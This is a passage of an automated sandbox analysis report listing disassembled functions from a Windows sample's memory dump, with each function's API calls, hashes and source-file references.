                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: de0386cc40ce05f091ed8d3e4fcc92bb5f418bbc4a5d3a02b097a2d5eae81413
                                                      • Instruction ID: dfe049e06edcfffb82ccecc793b797e57614911e323436a63ac877f9d570ba04
                                                      • Opcode Fuzzy Hash: de0386cc40ce05f091ed8d3e4fcc92bb5f418bbc4a5d3a02b097a2d5eae81413
                                                      • Instruction Fuzzy Hash: D0417C346092189FDB01CF68CA94FA977F5BB49315F1550AEE894AB261C732E942CF90
                                                      Function 00EC16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00EC16EB
                                                        • Part of subcall function 00E93A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E93A57
                                                        • Part of subcall function 00E93A3D: GetCurrentThreadId.KERNEL32 ref: 00E93A5E
                                                        • Part of subcall function 00E93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E925B3), ref: 00E93A65
                                                      • GetCaretPos.USER32(?), ref: 00EC16FF
                                                      • ClientToScreen.USER32(00000000,?), ref: 00EC174C
                                                      • GetForegroundWindow.USER32 ref: 00EC1752
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: cf1d26fb8f71c446af35e2d76b1bbb33bf6e321dbf813e2e3cba149166614bef
                                                      • Instruction ID: 2e6fde9b04c577e14d78b2c9dbf7684a358533631d5a6eb6c6f339d191e6b778
                                                      • Opcode Fuzzy Hash: cf1d26fb8f71c446af35e2d76b1bbb33bf6e321dbf813e2e3cba149166614bef
                                                      • Instruction Fuzzy Hash: 9A315075D00109AFCB04EFA9C985DAEBBF9EF49304B5490AAE415F7212D631DE46CFA0
                                                      Function 00E9D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00E9D501
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00E9D50F
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00E9D52F
                                                      • CloseHandle.KERNEL32(00000000), ref: 00E9D5DC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 420147892-0
                                                      • Opcode ID: cbe69378a29fc673a9d261ec7f6866145c21d7bd2b0cafced86dbe3dbc984ba3
                                                      • Instruction ID: 84fe627524618fe238524d43c454d582caf678511c82a14039865509c67a48d9
                                                      • Opcode Fuzzy Hash: cbe69378a29fc673a9d261ec7f6866145c21d7bd2b0cafced86dbe3dbc984ba3
                                                      • Instruction Fuzzy Hash: 06319C311083009FD304EF64DC85AAFBBF8AFD9354F14092DF585A61A2EB719949CB92
                                                      Function 00EC8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      • GetCursorPos.USER32(?), ref: 00EC9001
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E87711,?,?,?,?,?), ref: 00EC9016
                                                      • GetCursorPos.USER32(?), ref: 00EC905E
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E87711,?,?,?), ref: 00EC9094
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: 1f10af34a9d7fc52321908dbe51a0578a445fb27e94a9b023dc2d406ef95449c
                                                      • Instruction ID: c72d7af8fe6817253543e3b637f4de4333452a9ee0de49ab0bbc58659296243e
                                                      • Opcode Fuzzy Hash: 1f10af34a9d7fc52321908dbe51a0578a445fb27e94a9b023dc2d406ef95449c
                                                      • Instruction Fuzzy Hash: 6321D131600118EFDB258F95CC59FFA3BB9FF89350F104069F9056B2A2C3769992EB60
                                                      Function 00E9D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,00ECCB68), ref: 00E9D2FB
                                                      • GetLastError.KERNEL32 ref: 00E9D30A
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E9D319
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00ECCB68), ref: 00E9D376
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      • Opcode ID: c6ef4cc1a0773b1e0d3249d486f3c8bfb6d2797805e46ab9909bd104ce7c4526
                                                      • Instruction ID: 8c1936736d59210513c04efafe6d70c6930ecb2942f9eeb68552ac3d25cea3b0
                                                      • Opcode Fuzzy Hash: c6ef4cc1a0773b1e0d3249d486f3c8bfb6d2797805e46ab9909bd104ce7c4526
                                                      • Instruction Fuzzy Hash: 50219F705083119F8B04DF28C8858AEBBE4AF56369F205A1DF499E32A1D731D94ACB93
                                                      Function 00E91571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E91014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E9102A
                                                        • Part of subcall function 00E91014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E91036
                                                        • Part of subcall function 00E91014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E91045
                                                        • Part of subcall function 00E91014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E9104C
                                                        • Part of subcall function 00E91014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E91062
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E915BE
                                                      • _memcmp.LIBVCRUNTIME ref: 00E915E1
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E91617
                                                      • HeapFree.KERNEL32(00000000), ref: 00E9161E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      • Opcode ID: dcdee8c37498648ac053bb297fb75bd0fe64561384e048655f495f9a70e3f0f6
                                                      • Instruction ID: d09adae023f9845d86b7c4e6d06d433d20f45abbca2b55c350dec4db29b1f699
                                                      • Opcode Fuzzy Hash: dcdee8c37498648ac053bb297fb75bd0fe64561384e048655f495f9a70e3f0f6
                                                      • Instruction Fuzzy Hash: E9219D31E4010AEFDF00DFA5C945BEEB7B8EF44348F194499E445BB241E731AA49CBA0
                                                      Function 00EC2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00EC280A
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EC2824
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EC2832
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EC2840
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      • Opcode ID: 4d002275cc216090126845596a038997a7458bbc7aa12c810af03967cfb6b4d4
                                                      • Instruction ID: ccc56bbd5858d936e65468edc6825204ba2ff57402cf637ad9a00d78f3e75008
                                                      • Opcode Fuzzy Hash: 4d002275cc216090126845596a038997a7458bbc7aa12c810af03967cfb6b4d4
                                                      • Instruction Fuzzy Hash: DE21C131204511AFD7149B24C984FAA7B99AF45324F24915DF52AAB6E2CB72FC43CB90
                                                      Function 00E978F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E98D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E9790A,?,000000FF,?,00E98754,00000000,?,0000001C,?,?), ref: 00E98D8C
                                                        • Part of subcall function 00E98D7D: lstrcpyW.KERNEL32(00000000,?,?,00E9790A,?,000000FF,?,00E98754,00000000,?,0000001C,?,?,00000000), ref: 00E98DB2
                                                        • Part of subcall function 00E98D7D: lstrcmpiW.KERNEL32(00000000,?,00E9790A,?,000000FF,?,00E98754,00000000,?,0000001C,?,?), ref: 00E98DE3
                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E98754,00000000,?,0000001C,?,?,00000000), ref: 00E97923
                                                      • lstrcpyW.KERNEL32(00000000,?,?,00E98754,00000000,?,0000001C,?,?,00000000), ref: 00E97949
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E98754,00000000,?,0000001C,?,?,00000000), ref: 00E97984
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      • Opcode ID: 3cea54786d5b5d3d5435f155c7e6da7b78747eb52fb117d8a9a184d8365723f4
                                                      • Instruction ID: 8115e66aa3f22724391b425ab313b3aacbe715be4681b42945795856659a21f2
                                                      • Opcode Fuzzy Hash: 3cea54786d5b5d3d5435f155c7e6da7b78747eb52fb117d8a9a184d8365723f4
                                                      • Instruction Fuzzy Hash: E311033A200302AFCF159F39D844E7A77E9FF85354B10502AF986DB2A4EB329805C7A1
                                                      Function 00EC7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC7D0B
                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00EC7D2A
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EC7D42
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EAB7AD,00000000), ref: 00EC7D6B
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID:
                                                      • API String ID: 847901565-0
                                                      • Opcode ID: 37de330928d93b755634641385dafbe77efc83670957cefe2d59566957e816e2
                                                      • Instruction ID: 55d66081ad36567d4c015fd177fc03242c5d1a854da78188bdd96f3c7288facd
                                                      • Opcode Fuzzy Hash: 37de330928d93b755634641385dafbe77efc83670957cefe2d59566957e816e2
                                                      • Instruction Fuzzy Hash: 7911AE31604615AFCB108F28DD04EA63BA4BF46364F215328F87AE72E0D7328952DB40
                                                      Function 00EC5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00EC56BB
                                                      • _wcslen.LIBCMT ref: 00EC56CD
                                                      • _wcslen.LIBCMT ref: 00EC56D8
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC5816
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend_wcslen
                                                      • String ID:
                                                      • API String ID: 455545452-0
                                                      • Opcode ID: a3165d853d437e572fe32ae4ede3cbe2b72c17c9dd4f669bfd857de8571e2142
                                                      • Instruction ID: c4f8459ebd405b1980bd96f80d2d0f0620aed8a554f6bee8161617309227c7e6
                                                      • Opcode Fuzzy Hash: a3165d853d437e572fe32ae4ede3cbe2b72c17c9dd4f669bfd857de8571e2142
                                                      • Instruction Fuzzy Hash: 8311E47260060896DB209F61CE85FEE37ACBF50768B10546EF916F6081E771EAC6CB60
                                                      Function 00E61D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 87bce0e78925c9adc8b27ccf0c4dd53c0f80a798086ddcc49a348f63dd44145b
                                                      • Instruction ID: b1fb734377b2cbe600abaa0c692e4fcf9e257d39a57e4accb4dab33e297caa9c
                                                      • Opcode Fuzzy Hash: 87bce0e78925c9adc8b27ccf0c4dd53c0f80a798086ddcc49a348f63dd44145b
                                                      • Instruction Fuzzy Hash: 8E01A2B268AA163EF61216797CC1F676A6CDF817F9F382369F621712D2DB618C005170
                                                      Function 00E91A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E91A47
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E91A59
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E91A6F
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E91A8A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: df0dd9ef6b9ed376439bac7b7907381cec5752148407f47d1d9d0388e2943461
                                                      • Instruction ID: 9c2f58240da581db733fd72d8b8441417b29678ee5191ab731bc5326556d9356
                                                      • Opcode Fuzzy Hash: df0dd9ef6b9ed376439bac7b7907381cec5752148407f47d1d9d0388e2943461
                                                      • Instruction Fuzzy Hash: 6511093AD01219FFEF11DBA5CD85FADBB78EB08754F2000A1EA04B7290D6B16E51DB94
                                                      Function 00E9E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00E9E1FD
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00E9E230
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E9E246
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E9E24D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 2880819207-0
                                                      • Opcode ID: e9ec98119a78d231f87e63ae39a7c51e7b8cdb18c9071e845385525ba86a450b
                                                      • Instruction ID: 1d1b6edf5a9e708db1806763d8625aa0001e5006cc629db21ce4b91a6d49cacd
                                                      • Opcode Fuzzy Hash: e9ec98119a78d231f87e63ae39a7c51e7b8cdb18c9071e845385525ba86a450b
                                                      • Instruction Fuzzy Hash: 2F11C876904258BFCB01DBA9AC05E9E7FACFB45714F144265F924F3391D671CD0487A0
                                                      Function 00E5D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,?,00E5CFF9,00000000,00000004,00000000), ref: 00E5D218
                                                      • GetLastError.KERNEL32 ref: 00E5D224
                                                      • __dosmaperr.LIBCMT ref: 00E5D22B
                                                      • ResumeThread.KERNEL32(00000000), ref: 00E5D249
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                      • String ID:
                                                      • API String ID: 173952441-0
                                                      • Opcode ID: 6f735da1765e78e4640e33652e234c01e1efc90309bb50363fe8fa7cd8975c47
                                                      • Instruction ID: b3594febad4d993fa8db326b9ce637a27c7a95ddbc54a6a7f334cf3cd606e04a
                                                      • Opcode Fuzzy Hash: 6f735da1765e78e4640e33652e234c01e1efc90309bb50363fe8fa7cd8975c47
                                                      • Instruction Fuzzy Hash: B601DB7A409204BFC7215BA6DC05B9E7AA9DF81732F201659FD25B11E0DB71890AC6A0
                                                      Function 00E3600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E3604C
                                                      • GetStockObject.GDI32(00000011), ref: 00E36060
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E3606A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateMessageObjectSendStockWindow
                                                      • String ID:
                                                      • API String ID: 3970641297-0
                                                      • Opcode ID: 51a8c0f82f43b017b7375452495b0f1f325d6bdf434980a36033c0617effc924
                                                      • Instruction ID: 808cc62acb9d77bf8e5181a7882b814387ed1340fec3b6043f392c5d317f73d1
                                                      • Opcode Fuzzy Hash: 51a8c0f82f43b017b7375452495b0f1f325d6bdf434980a36033c0617effc924
                                                      • Instruction Fuzzy Hash: 3911A172501508BFEF264FA48C49EEA7F69FF09354F145112FA0466110C732DC60DFA0
                                                      Function 00E53B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00E53B56
                                                        • Part of subcall function 00E53AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00E53AD2
                                                        • Part of subcall function 00E53AA3: ___AdjustPointer.LIBCMT ref: 00E53AED
                                                      • _UnwindNestedFrames.LIBCMT ref: 00E53B6B
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00E53B7C
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00E53BA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
